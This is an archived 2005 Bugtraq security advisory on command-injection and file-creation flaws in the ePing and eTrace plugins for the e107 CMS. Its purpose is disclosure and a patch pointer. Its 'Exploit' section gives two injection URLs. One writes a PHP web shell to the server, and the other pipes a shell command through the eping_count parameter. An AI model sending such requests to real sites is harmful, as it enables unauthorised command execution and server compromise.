Vulnerability in ePing and eTrace plugins of e107

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Vulnerability in ePing and eTrace plugins of e107
From: os2a.bto@xxxxxxxxx
Date: 5 Aug 2005 15:21:44 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

OS2A

ePing Arbitrary File Creation/Command Execution Vulnerability

OS2A ID: OS2A_1001 Status
Published: 08/04/2005 Updated :
08/05/2005
Patch Released

Class: File Creation/Command Execution
Severity: CRITICAL

Overview:
ePing is a ping utility plugin for e107, a PHP-based content management system
that uses a MySQL backend database. ePing versions 1.02 and prior are
vulnerable to a file creation vulnerability caused by improper validation of
user-supplied input in the doping.php script. A remote attacker exploiting this
vulnerability could then create an arbitrary file in the webserver, pipe
multiple system commands in the eping_host or the eping_count parameters of the
doping.php script, which would be executed within the security context of the
hosting site.

eTrace, another utility plugin for e107 has similar vulnerabilities.

Description:
e107 portal's eping plugin 1.02 and prior is prone to remote command execution
vulnerability. This vulnerability exists due to output redirection operators
like '>', '|', '&' are not being sanitized in eping_host,eping_count parameters
in the doping.php script.

eping_host has a validate function in functions.php which does not consider the
above mentioned case.

eping_count has no validation logic. It accepts the above mentioned system
meaningful characters.

Impact:
A remote user can execute any command using '|' character or create a file with
malicious executable code with '>' character. Execution of arbitrary command or
creation of arbitrary files can lead to, Denial of service, Disclosure or
modification of system information or Execution of arbitrary code.

Affected Systems:
ePing version 1.02 and prior
Linux (Any), Unix (Any), Windows (Any)

Exploit:

a.
http://example.com/e107/e107_plugins/eping/doping.php?eping_cmd=ping%20-n&eping_host=127.0.0.1&eping_count=2%20%22%3C?php%20system(%94cmd.exe%94)?%3E%22%20%3Etest.php

b.
http://example.com/e107/e107_plugins/eping/doping.php?eping_cmd=ping%20-n&eping_host=127.0.0.1&eping_count=2|dir

Solutions:
Patch:
Upgrade to the version 1.03 of ePing and eTrace plugins.

Prev by Date: Root exploits in Lantonix Secure Console Server
Next by Date: Re: On classifying attacks
Previous by thread: Root exploits in Lantonix Secure Console Server
Next by thread: [ GLSA 200508-04 ] Netpbm: Arbitrary code execution in pstopnm
Index(es):
- Date
- Thread